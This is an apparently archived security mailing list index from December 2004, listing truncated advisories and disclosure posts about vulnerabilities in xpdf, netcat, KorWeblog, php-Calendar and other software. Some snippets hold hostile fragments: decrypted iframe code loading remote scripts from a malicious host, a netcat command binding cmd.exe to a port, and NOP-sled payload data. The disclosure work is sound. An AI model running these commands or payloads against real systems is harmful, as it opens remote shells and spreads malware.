|
|
Colapse all |
Post message
MDKSA-2004:161 - Updated xpdf packages fix buffer overflow vulnerability 2004-12-30 Mandrake Linux Security Team (security linux-mandrake com) MDKSA-2004:160 - Updated kdelibs packages fix konqueror email vulnerability 2004-12-30 Mandrake Linux Security Team (security linux-mandrake com) Strange Java Loader 2004-12-30 duffbeer (duffbeer gmx net) Hi People, before reading this, dont go on any of the sites unless you are sure ;) after decrypting some stuff, this is the source from: http://xxl-size.com/cogo.html ------------------------------------- <iframe src="http://209.8.20.130/dl/adv346.php"> <iframe src="http://www.awmcash.biz/adverts/ [ more ] [ reply ] [SECURITY] [DSA 620-1] New perl packages fix several vulnerabilities 2004-12-30 joey infodrom org (Martin Schulze) NetCat V 1.11 Multiple Bugs 2004-12-30 CorryL (corryl80 gmail com) Hello the nc V1.11 is bugged execute nc -p 777 -L -e cmd.exe create te file prova.txt and insert \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x [ more ] [ reply ] KorWeblog php injection Vulnerability 2004-12-30 Min-sung Choi (mins fsu or kr) KorWeblog php injection Vulnerability Release Date : 2004/12/31 (KST) Author : Mins (mins at fsu.or.kr) Product : KorWeblog http://weblog.kldp.org Vendor-Status: Vendor was contacted but I could not receive reply message. Vendor-Patches: None Impact: Attacker can execute arbitrary php code [ more ] [ reply ] [ GLSA 200412-26 ] ViewCVS: Information leak and XSS vulnerabilities 2004-12-28 Thierry Carrez (koon gentoo org) Sanity Worm Concepts 2004-12-29 Andy Fewtrell (afsec throwaway coldfyre net) (1 replies) I was writing some new rules for mod_security (http://www.modsecurity.org) to try and trap other methods that this sanity worm might try to exploit later. Unfortunately the ideas I came up with are slightly worrying with how easily this worm could actually spread. Right now the sanity worm uses pe [ more ] [ reply ] QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004] 2004-12-29 Julio Cesar Fort (julio rfdslabs com br) php-Calendar File Include Vulnerability [ Command Exec ] 2004-12-29 GulfTech Security (security gulftech org) ########################################################## # GulfTech Security Research December 28th, 2004 ########################################################## # Vendor : Sean Proctor # URL : http://php-calendar.sourceforge.net/ # Version : All Versions # Risk : File Include V [ more ] [ reply ] [CLA-2004:909] Conectiva Security Announcement - netpbm 2004-12-29 Conectiva Updates (secure conectiva com br) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ -- CONECTIVA LINUX SECURITY ANNOUNCEMENT - ------------------------------------------------------------------------ -- PACKAGE : netpbm SUMMARY : Insecure temporary file crea [ more ] [ reply ] Re: Microsoft Windows LoadImage API IntegerBuffer overflow 2004-12-25 Berend-Jan Wever (skylined edup tudelft nl) Since the exploit published by flashsky is a rip off of my IE exploit script published in the IFRAME exploit, it will probably be caught by some IDS/AV signatures as being the IFRAME exploit. Cheers, SkyLined > > This vul can be exploited, at > http://www.xfocus.net/flashsky/icoExp/index.htm [ more ] [ reply ] XSA-2004-7: stack overflow in AIFF demultiplexer 2004-12-26 Michael Roitzsch (mroi users sourceforge net) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 xine security announcement ========================== Announcement-ID: XSA-2004-7 Summary: A stack buffer overflow vulnerability in the AIFF demultiplexer has been found by Ariel Berkman and was reported to the xine team by D. J. Bernstein. This can [ more ] [ reply ] Netcat v1.11 For Windows , New fixed version 2004-12-29 Hat-Squad Security Team (bugtraq hat-squad com) [HAT-SQUAD] NetCat Remote Critical Vulnerability, Poc included 2004-12-27 Hat-Squad Security Team (bugtraq hat-squad com) (1 replies) December 26, 2004 Hat-Squad Advisory: Remote buffer overflow in Netcat TCP/IP Swiss Army Knife Product: Netcat - nc11nt.zip Vendor Url: http://www.securityfocus.com/tools/139/scoreit Version: Netcat v1.1 Vulnerability: Remote stack overflow in the DNS control part Release Date: 26 December, [ more ] [ reply ] Re: [HAT-SQUAD] NetCat Remote Critical Vulnerability, Poc included 2004-12-28 Chris Wysopal (weld vulnwatch org) Remote code execution with parameters withoutu ser interaction, even with XP SP2 2004-12-28 ShredderSub7 SecExpert (shreddersub7 hotmail com) PoC (called CMDExe): http://www.freewebs.com/shreddersub7/htm.htm Discussion: http://www.freewebs.com/shreddersub7/expl-discuss.htm ------------------Which systems are vulnerable?-------- Any system running any Microsoft Windows XP edition with Internet Explorer 6 or higher, even with SP2 applied. [ more ] [ reply ] Multiple WHM Autopilot Vulnerabilities 2004-12-28 GulfTech Security (security gulftech org) ########################################################## # GulfTech Security Research December 28th, 2004 ########################################################## # Vendor : Benchmark Designs, LLC # URL : http://www.whmautopilot.com/ # Version : WHM AutoPilot v2.4.6.5 && Others [All [ more ] [ reply ] Did a 16-bit counter overflow shut down Comair? 2004-12-28 Richard M. Smith (rms computerbytesman com) (2 replies) Hi, On Christmas Day last Saturday, Comair Airlines had to completely stop flying all of its planes due to computer problems. Comair blamed the computer problems on their pilot scheduling software being overloaded after bad weather earlier in the week forced many flights to be rescheduled. Comair [ more ] [ reply ] Re: Did a 16-bit counter overflow shut down Comair? 2004-12-29 Avleen Vig (lists-bugtraq silverwraith com) possible error in latest NGS realplayer advisory 2004-12-28 Marc Bejarano (bugtraq beej org) since my emails to research (at) ngssoftware (dot) com [email concealed] appear to go in a black hole, i'm posting here. they seem to at least read my emails that make it here :) marc ===== Date: Thu, 02 Dec 2004 22:14:16 -0400 To: research (at) ngssoftware (dot) com [email concealed] From: Marc Bejarano <censored> Subject: error in latest realplayer ad [ more ] [ reply ] MDKSA-2004:158 - Updated samba packages fix integer overflow vulnerabilities 2004-12-27 Mandrake Linux Security Team (security linux-mandrake com) |
|
Privacy Statement |
Hash: SHA1
_______________________________________________________________________
Mandrakelinux Security Update Advisory
_______________________________________________________________________
Package name: xpdf
Advisory ID:
[ more ] [ reply ]